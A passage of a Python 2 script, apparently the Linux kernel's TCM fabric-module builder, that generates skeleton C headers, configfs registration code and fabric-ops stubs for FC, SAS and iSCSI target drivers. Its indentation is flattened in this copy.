if os.path.isdir(fabric_mod_dir_var) == True:
return 1
print "Creating fabric_mod_dir: " + fabric_mod_dir_var
ret = os.mkdir(fabric_mod_dir_var)
if ret:
tcm_mod_err("Unable to mkdir " + fabric_mod_dir_var)
return
def tcm_mod_build_FC_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for FC Initiator Nport */\n"
buf += " u64 nport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Initiator Nport */\n"
buf += " char nport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* FC lport target portal group tag for TCM */\n"
buf += " u16 lport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_lport */\n"
buf += " struct " + fabric_mod_name + "_lport *lport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_lport {\n"
buf += " /* SCSI protocol the lport is providing */\n"
buf += " u8 lport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for FC Target Lport */\n"
buf += " u64 lport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Target Lport */\n"
buf += " char lport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_lport() */\n"
buf += " struct se_wwn lport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "lport"
fabric_mod_init_port = "nport"
return
def tcm_mod_build_SAS_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for SAS Initiator port */\n"
buf += " u64 iport_wwpn;\n"
buf += " /* ASCII formatted WWPN for Sas Initiator port */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* SAS port target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for SAS Target port */\n"
buf += " u64 tport_wwpn;\n"
buf += " /* ASCII formatted WWPN for SAS Target port */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_iSCSI_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* ASCII formatted InitiatorName */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* iSCSI target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* ASCII formatted TargetName for IQN */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_base_includes(proto_ident, fabric_mod_dir_val, fabric_mod_name):
if proto_ident == "FC":
tcm_mod_build_FC_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "SAS":
tcm_mod_build_SAS_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "iSCSI":
tcm_mod_build_iSCSI_include(fabric_mod_dir_val, fabric_mod_name)
else:
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
return
def tcm_mod_build_configfs(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_configfs.c"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#include <linux/module.h>\n"
buf += "#include <linux/moduleparam.h>\n"
buf += "#include <linux/version.h>\n"
buf += "#include <generated/utsrelease.h>\n"
buf += "#include <linux/utsname.h>\n"
buf += "#include <linux/init.h>\n"
buf += "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/configfs.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_transport.h>\n"
buf += "#include <target/target_core_fabric_ops.h>\n"
buf += "#include <target/target_core_fabric_configfs.h>\n"
buf += "#include <target/target_core_fabric_lib.h>\n"
buf += "#include <target/target_core_device.h>\n"
buf += "#include <target/target_core_tpg.h>\n"
buf += "#include <target/target_core_configfs.h>\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/configfs_macros.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "/* Local pointer to allocated TCM configfs fabric module */\n"
buf += "struct target_fabric_configfs *" + fabric_mod_name + "_fabric_configfs;\n\n"
buf += "static struct se_node_acl *" + fabric_mod_name + "_make_nodeacl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct se_node_acl *se_nacl, *se_nacl_new;\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n"
buf += " u32 nexus_depth;\n\n"
buf += " /* " + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n"
buf += " se_nacl_new = " + fabric_mod_name + "_alloc_fabric_acl(se_tpg);\n"
buf += " if (!(se_nacl_new))\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += "//#warning FIXME: Hardcoded nexus depth in " + fabric_mod_name + "_make_nodeacl()\n"
buf += " nexus_depth = 1;\n"
buf += " /*\n"
buf += " * se_nacl_new may be released by core_tpg_add_initiator_node_acl()\n"
buf += " * when converting a NodeACL from demo mode -> explict\n"
buf += " */\n"
buf += " se_nacl = core_tpg_add_initiator_node_acl(se_tpg, se_nacl_new,\n"
buf += " name, nexus_depth);\n"
buf += " if (IS_ERR(se_nacl)) {\n"
buf += " " + fabric_mod_name + "_release_fabric_acl(se_tpg, se_nacl_new);\n"
buf += " return se_nacl;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Locate our struct " + fabric_mod_name + "_nacl and set the FC Nport WWPN\n"
buf += " */\n"
buf += " nacl = container_of(se_nacl, struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " nacl->" + fabric_mod_init_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&nacl->" + fabric_mod_init_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return se_nacl;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_nodeacl(struct se_node_acl *se_acl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_acl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " core_tpg_del_initiator_node_acl(se_acl->se_tpg, se_acl, 1);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
buf += "static struct se_portal_group *" + fabric_mod_name + "_make_tpg(\n"
buf += " struct se_wwn *wwn,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + "*" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg;\n"
buf += " unsigned long tpgt;\n"
buf += " int ret;\n\n"
buf += " if (strstr(name, \"tpgt_\") != name)\n"
buf += " return ERR_PTR(-EINVAL);\n"
buf += " if (strict_strtoul(name + 5, 10, &tpgt) || tpgt > UINT_MAX)\n"
buf += " return ERR_PTR(-EINVAL);\n\n"
buf += " tpg = kzalloc(sizeof(struct " + fabric_mod_name + "_tpg), GFP_KERNEL);\n"
buf += " if (!(tpg)) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_tpg\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
buf += " tpg->" + fabric_mod_port + " = " + fabric_mod_port + ";\n"
buf += " tpg->" + fabric_mod_port + "_tpgt = tpgt;\n\n"
buf += " ret = core_tpg_register(&" + fabric_mod_name + "_fabric_configfs->tf_ops, wwn,\n"
buf += " &tpg->se_tpg, (void *)tpg,\n"
buf += " TRANSPORT_TPG_TYPE_NORMAL);\n"
buf += " if (ret < 0) {\n"
buf += " kfree(tpg);\n"
buf += " return NULL;\n"
buf += " }\n"
buf += " return &tpg->se_tpg;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_tpg(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n\n"
buf += " core_tpg_deregister(se_tpg);\n"
buf += " kfree(tpg);\n"
buf += "}\n\n"
buf += "static struct se_wwn *" + fabric_mod_name + "_make_" + fabric_mod_port + "(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + ";\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n\n"
buf += " /* if (" + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n\n"
buf += " " + fabric_mod_port + " = kzalloc(sizeof(struct " + fabric_mod_name + "_" + fabric_mod_port + "), GFP_KERNEL);\n"
buf += " if (!(" + fabric_mod_port + ")) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_" + fabric_mod_port + "\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " " + fabric_mod_port + "->" + fabric_mod_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&" + fabric_mod_port + "->" + fabric_mod_port + "_name[0], " + fabric_mod_name.upper() + "__NAMELEN, wwpn); */\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_wwn;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_" + fabric_mod_port + "(struct se_wwn *wwn)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n"
buf += " kfree(" + fabric_mod_port + ");\n"
buf += "}\n\n"
buf += "static ssize_t " + fabric_mod_name + "_wwn_show_attr_version(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " char *page)\n"
buf += "{\n"
buf += " return sprintf(page, \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \"on \"UTS_RELEASE\"\\n\", " + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += "}\n\n"
buf += "TF_WWN_ATTR_RO(" + fabric_mod_name + ", version);\n\n"
buf += "static struct configfs_attribute *" + fabric_mod_name + "_wwn_attrs[] = {\n"
buf += " &" + fabric_mod_name + "_wwn_version.attr,\n"
buf += " NULL,\n"
buf += "};\n\n"
buf += "static struct target_core_fabric_ops " + fabric_mod_name + "_ops = {\n"
buf += " .get_fabric_name = " + fabric_mod_name + "_get_fabric_name,\n"
buf += " .get_fabric_proto_ident = " + fabric_mod_name + "_get_fabric_proto_ident,\n"
buf += " .tpg_get_wwn = " + fabric_mod_name + "_get_fabric_wwn,\n"
buf += " .tpg_get_tag = " + fabric_mod_name + "_get_tag,\n"
buf += " .tpg_get_default_depth = " + fabric_mod_name + "_get_default_depth,\n"
buf += " .tpg_get_pr_transport_id = " + fabric_mod_name + "_get_pr_transport_id,\n"
buf += " .tpg_get_pr_transport_id_len = " + fabric_mod_name + "_get_pr_transport_id_len,\n"
buf += " .tpg_parse_pr_out_transport_id = " + fabric_mod_name + "_parse_pr_out_transport_id,\n"
buf += " .tpg_check_demo_mode = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_check_demo_mode_cache = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_demo_mode_write_protect = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_prod_mode_write_protect = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_alloc_fabric_acl = " + fabric_mod_name + "_alloc_fabric_acl,\n"
buf += " .tpg_release_fabric_acl = " + fabric_mod_name + "_release_fabric_acl,\n"
buf += " .tpg_get_inst_index = " + fabric_mod_name + "_tpg_get_inst_index,\n"
buf += " .release_cmd_to_pool = " + fabric_mod_name + "_release_cmd,\n"
buf += " .release_cmd_direct = " + fabric_mod_name + "_release_cmd,\n"
buf += " .shutdown_session = " + fabric_mod_name + "_shutdown_session,\n"
buf += " .close_session = " + fabric_mod_name + "_close_session,\n"
buf += " .stop_session = " + fabric_mod_name + "_stop_session,\n"
buf += " .fall_back_to_erl0 = " + fabric_mod_name + "_reset_nexus,\n"
buf += " .sess_logged_in = " + fabric_mod_name + "_sess_logged_in,\n"
buf += " .sess_get_index = " + fabric_mod_name + "_sess_get_index,\n"
buf += " .sess_get_initiator_sid = NULL,\n"
buf += " .write_pending = " + fabric_mod_name + "_write_pending,\n"
buf += " .write_pending_status = " + fabric_mod_name + "_write_pending_status,\n"
buf += " .set_default_node_attributes = " + fabric_mod_name + "_set_default_node_attrs,\n"
buf += " .get_task_tag = " + fabric_mod_name + "_get_task_tag,\n"
buf += " .get_cmd_state = " + fabric_mod_name + "_get_cmd_state,\n"
buf += " .new_cmd_failure = " + fabric_mod_name + "_new_cmd_failure,\n"
buf += " .queue_data_in = " + fabric_mod_name + "_queue_data_in,\n"
buf += " .queue_status = " + fabric_mod_name + "_queue_status,\n"
buf += " .queue_tm_rsp = " + fabric_mod_name + "_queue_tm_rsp,\n"
buf += " .get_fabric_sense_len = " + fabric_mod_name + "_get_fabric_sense_len,\n"
buf += " .set_fabric_sense_len = " + fabric_mod_name + "_set_fabric_sense_len,\n"
buf += " .is_state_remove = " + fabric_mod_name + "_is_state_remove,\n"
buf += " .pack_lun = " + fabric_mod_name + "_pack_lun,\n"
buf += " /*\n"
buf += " * Setup function pointers for generic logic in target_core_fabric_configfs.c\n"
buf += " */\n"
buf += " .fabric_make_wwn = " + fabric_mod_name + "_make_" + fabric_mod_port + ",\n"
buf += " .fabric_drop_wwn = " + fabric_mod_name + "_drop_" + fabric_mod_port + ",\n"
buf += " .fabric_make_tpg = " + fabric_mod_name + "_make_tpg,\n"
buf += " .fabric_drop_tpg = " + fabric_mod_name + "_drop_tpg,\n"
buf += " .fabric_post_link = NULL,\n"
buf += " .fabric_pre_unlink = NULL,\n"
buf += " .fabric_make_np = NULL,\n"
buf += " .fabric_drop_np = NULL,\n"
buf += " .fabric_make_nodeacl = " + fabric_mod_name + "_make_nodeacl,\n"
buf += " .fabric_drop_nodeacl = " + fabric_mod_name + "_drop_nodeacl,\n"
buf += "};\n\n"
buf += "static int " + fabric_mod_name + "_register_configfs(void)\n"
buf += "{\n"
buf += " struct target_fabric_configfs *fabric;\n"
buf += " int ret;\n\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \" on \"UTS_RELEASE\"\\n\"," + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += " /*\n"
buf += " * Register the top level struct config_item_type with TCM core\n"
buf += " */\n"
buf += " fabric = target_fabric_configfs_init(THIS_MODULE, \"" + fabric_mod_name[4:] + "\");\n"
buf += " if (!(fabric)) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_init() failed\\n\");\n"
buf += " return -ENOMEM;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup fabric->tf_ops from our local " + fabric_mod_name + "_ops\n"
buf += " */\n"
buf += " fabric->tf_ops = " + fabric_mod_name + "_ops;\n"
buf += " /*\n"
buf += " * Setup default attribute lists for various fabric->tf_cit_tmpl\n"
buf += " */\n"
buf += " TF_CIT_TMPL(fabric)->tfc_wwn_cit.ct_attrs = " + fabric_mod_name + "_wwn_attrs;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_param_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_np_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_auth_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_param_cit.ct_attrs = NULL;\n"
buf += " /*\n"
buf += " * Register the fabric for use within TCM\n"
buf += " */\n"
buf += " ret = target_fabric_configfs_register(fabric);\n"
buf += " if (ret < 0) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_register() failed\"\n"
buf += " \" for " + fabric_mod_name.upper() + "\\n\");\n"
buf += " return ret;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup our local pointer to *fabric\n"
buf += " */\n"
buf += " " + fabric_mod_name + "_fabric_configfs = fabric;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Set fabric -> " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void " + fabric_mod_name + "_deregister_configfs(void)\n"
buf += "{\n"
buf += " if (!(" + fabric_mod_name + "_fabric_configfs))\n"
buf += " return;\n\n"
buf += " target_fabric_configfs_deregister(" + fabric_mod_name + "_fabric_configfs);\n"
buf += " " + fabric_mod_name + "_fabric_configfs = NULL;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Cleared " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += "};\n\n"
buf += "static int __init " + fabric_mod_name + "_init(void)\n"
buf += "{\n"
buf += " int ret;\n\n"
buf += " ret = " + fabric_mod_name + "_register_configfs();\n"
buf += " if (ret < 0)\n"
buf += " return ret;\n\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void " + fabric_mod_name + "_exit(void)\n"
buf += "{\n"
buf += " " + fabric_mod_name + "_deregister_configfs();\n"
buf += "};\n\n"
buf += "#ifdef MODULE\n"
buf += "MODULE_DESCRIPTION(\"" + fabric_mod_name.upper() + " series fabric driver\");\n"
buf += "MODULE_LICENSE(\"GPL\");\n"
buf += "module_init(" + fabric_mod_name + "_init);\n"
buf += "module_exit(" + fabric_mod_name + "_exit);\n"
buf += "#endif\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_scan_fabric_ops(tcm_dir):
fabric_ops_api = tcm_dir + "include/target/target_core_fabric_ops.h"
print "Using tcm_mod_scan_fabric_ops: " + fabric_ops_api
process_fo = 0;
p = open(fabric_ops_api, 'r')
line = p.readline()
while line:
if process_fo == 0 and re.search('struct target_core_fabric_ops {', line):
line = p.readline()
continue
if process_fo == 0:
process_fo = 1;
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
continue
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
p.close()
return
def tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
bufi = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.c"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
fi = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.h"
print "Writing file: " + fi
pi = open(fi, 'w')
if not pi:
tcm_mod_err("Unable to open file: " + fi)
buf = "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/list.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n"
buf += "#include <scsi/scsi.h>\n"
buf += "#include <scsi/scsi_host.h>\n"
buf += "#include <scsi/scsi_device.h>\n"
buf += "#include <scsi/scsi_cmnd.h>\n"
buf += "#include <scsi/libfc.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_transport.h>\n"
buf += "#include <target/target_core_fabric_ops.h>\n"
buf += "#include <target/target_core_fabric_lib.h>\n"
buf += "#include <target/target_core_device.h>\n"
buf += "#include <target/target_core_tpg.h>\n"
buf += "#include <target/target_core_configfs.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "int " + fabric_mod_name + "_check_true(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_true(struct se_portal_group *);\n"
buf += "int " + fabric_mod_name + "_check_false(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_false(struct se_portal_group *);\n"
total_fabric_ops = len(fabric_ops)
i = 0
while i < total_fabric_ops:
fo = fabric_ops[i]
i += 1
# print "fabric_ops: " + fo
if re.search('get_fabric_name', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_name(void)\n"
buf += "{\n"
buf += " return \"" + fabric_mod_name[4:] + "\";\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_name(void);\n"
continue
if re.search('get_fabric_proto_ident', fo):
buf += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " u8 proto_id;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " proto_id = fc_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " proto_id = sas_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " proto_id = iscsi_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return proto_id;\n"
buf += "}\n\n"
bufi += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *);\n"
if re.search('get_wwn', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_name[0];\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *);\n"
if re.search('get_tag', fo):
buf += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " return tpg->" + fabric_mod_port + "_tpgt;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *);\n"
if re.search('get_default_depth', fo):
buf += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *);\n"
if re.search('get_pr_transport_id\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code,\n"
buf += " unsigned char *buf)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *, unsigned char *);\n"
if re.search('get_pr_transport_id_len\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
